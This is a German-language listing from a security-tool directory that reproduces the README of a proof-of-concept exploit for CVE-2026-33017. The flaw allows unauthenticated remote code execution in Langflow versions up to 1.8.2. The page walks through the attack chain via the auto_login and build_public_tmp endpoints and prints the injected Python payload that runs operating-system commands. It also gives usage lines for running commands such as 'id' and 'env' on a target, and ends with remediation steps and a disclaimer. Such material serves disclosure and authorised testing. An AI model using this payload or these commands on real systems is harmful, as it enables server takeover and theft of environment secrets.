Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-33017-langflow-rce — Proof-of-Concept für CVE-2026-33017, das unauthentifizierte Remote-Code-Ausführung in anfälligen Langflow-Versionen durch bösartige CustomComponent-Code-Injektion demonstriert. | Kitploit
Tools/GitHubGitHub/arensballiu/cve-2026-33017-langflow-rce
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-ToolPayload-Entwicklung
GitHubarensballiu/cve-2026-33017-langflow-rce

CVE-2026-33017-langflow-rce

Proof-of-Concept für CVE-2026-33017, das unauthentifizierte Remote-Code-Ausführung in anfälligen Langflow-Versionen durch bösartige CustomComponent-Code-Injektion demonstriert.

Repository anzeigen
1vor 4h 34mNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-33017 — Langflow Unauthentifizierte Remote-Code-Ausführung (RCE)

Überblick

CVE-ID: CVE-2026-33017
Betroffene Software: Langflow Verwundbare Versionen: <= 1.8.2 Behobene Version: >= 1.9.0 Schweregrad: Kritisch
Autor: arensballiu
Datum: 2026

Beschreibung

Langflow stellt einen öffentlichen Flow-Build-Endpunkt (/api/v1/build_public_tmp/{flowID}/flow) bereit, der beliebige CustomComponent-Codeblöcke akzeptiert und diese serverseitig ohne Authentifizierung ausführt. Durch das Injizieren einer bösartigen Python-Nutzlast in das code-Feld eines CustomComponent-Knotens kann ein nicht authentifizierter Angreifer beliebige Betriebssystembefehle mit den Rechten des Langflow-Serverprozesses ausführen.

Die Angriffskette missbraucht zunächst den /api/v1/auto_login-Endpunkt, der ein Bearer-Token ohne Anforderung von Anmeldedaten ausstellt, wenn Langflow in seiner Standard-Auto-Login-Konfiguration läuft. Dann verwendet sie dieses Token, um einen temporären öffentlichen Flow zu erstellen und die serverseitige Code-Ausführung über den Build-Endpunkt auszulösen.

Eine Docker-Datei ist enthalten, die eine Docker-Instanz mit installiertem und laufendem Langflow erstellt.

Betroffene Endpunkte

EndpunktMethodeAuthentifizierung erforderlichZweck
/api/v1/auto_loginGETNeinBearer-Token erhalten (Auto-Login muss aktiviert sein)
/api/v1/flows/POSTJa (Bearer)Einen neuen Flow erstellen
/api/v1/build_public_tmp/{flowID}/flowPOSTNein (öffentlich)Build auslösen — verwundbarer Ausführungspunkt
/api/v1/flows/{flowID}DELETEJa (Bearer)Den erstellten Flow bereinigen

Proof of Concept

Datei: CVE-2026-33017_POC.py

Voraussetzungen

  • Python 3.x
  • requests-Bibliothek
  • Netzwerkzugriff auf eine Langflow-Instanz, die mit aktiviertem Auto-Login läuft
root@kitploit:~
pip install requests

Verwendung

root@kitploit:~
python3 CVE-2026-33017_POC.py -u <target_url> -c <command> [-d]

Argumente

FlagLangformErforderlichBeschreibung
-u--urlJaBasis-URL der Langflow-Instanz
-c--commandJaAuf dem Server auszuführender OS-Befehl
-d--deleteNeinDen erstellten Flow nach der Ausnutzung löschen

Beispiele

Code-Ausführung überprüfen:

root@kitploit:~
python3 CVE-2026-33017_POC.py -u http://langflow.example.com -c "id"

Server-Umgebungsvariablen abrufen:

root@kitploit:~
python3 CVE-2026-33017_POC.py -u http://langflow.example.com -c "env"

Den Flow nach der Ausnutzung am Leben halten (Bereinigung überspringen):

root@kitploit:~
python3 CVE-2026-33017_POC.py -u http://langflow.example.com -c "whoami" -d

Erwartete Ausgabe

root@kitploit:~
[+] Got token
[+] Created flow with id: <id>
[+] Exploit sent successfully!
[+] Flow deleted successfully!

Payload-Analyse

Der Exploit injiziert das folgende Python-Snippet in das code-Feld eines CustomComponent-Knotens:

root@kitploit:~
from langflow.custom import Component
from langflow.io import Output
_r = __import__('os').system(<command>)
class ExploitComponent(Component):
    display_name = "ExploitComponent"
    outputs = [Output(display_name="Result", name="output", method="run")]
    def run(self):
        return "ok"
  • __import__('os').system(...) - importiert dynamisch das os-Modul und führt den vom Angreifer übergebenen Shell-Befehl auf dem Server aus.
  • Der Rest der Klassendefinition ist eine gültige CustomComponent, die erforderlich ist, um den Komponenten-Loader von Langflow zu erfüllen, ohne einen Parse-Fehler auszulösen.
  • Der Flow wird als PUBLIC erstellt und der Build-Endpunkt wird über seinen öffentlichen Endpunkt aufgerufen, was bedeutet, dass kein Session-Cookie oder Authentifizierungstoken erforderlich ist, um die Ausführung auszulösen.

Grundursache

Das CustomComponent-System von Langflow erlaubt es, beliebigen Python-Code als Teil einer Flow-Definition einzureichen. Der Endpunkt /api/v1/build_public_tmp/{flowID}/flow baut diesen Code serverseitig auf und wertet ihn teilweise aus, einschließlich Anweisungen auf Modulebene, ohne Sandboxing oder Einschränkung des Zugriffs auf Python-Built-ins wie __import__.

Zusammenfassung der Angriffskette

root@kitploit:~
1. GET /api/v1/auto_login          →  Bearer-Token erhalten (keine Anmeldedaten erforderlich)
2. POST /api/v1/flows/             →  Einen PUBLIC-Flow erstellen (Bearer-Token)
3. POST /api/v1/build_public_tmp/  →  Bösartige CustomComponent injizieren & ausführen (keine Auth)
4. DELETE /api/v1/flows/{id}       →  Bereinigen (optional)

Alle vier Schritte können von einem anonymen Angreifer gegen eine Standard-Langflow-Bereitstellung durchgeführt werden.

Behebung

  • Aktualisieren Sie Langflow auf Version 1.9.0 oder höher.
  • Deaktivieren Sie Auto-Login (LANGFLOW_AUTO_LOGIN=false) in jeder internetzugewandten Bereitstellung.

Haftungsausschluss

Dieser Proof of Concept wird ausschließlich für Bildungs- und autorisierte Sicherheitsforschungszwecke bereitgestellt. Die Verwendung dieses Skripts gegen Systeme ohne ausdrückliche schriftliche Genehmigung ist illegal und unethisch. Der Autor und die Mitwirkenden übernehmen keine Haftung für Missbrauch.

Tool herunterladen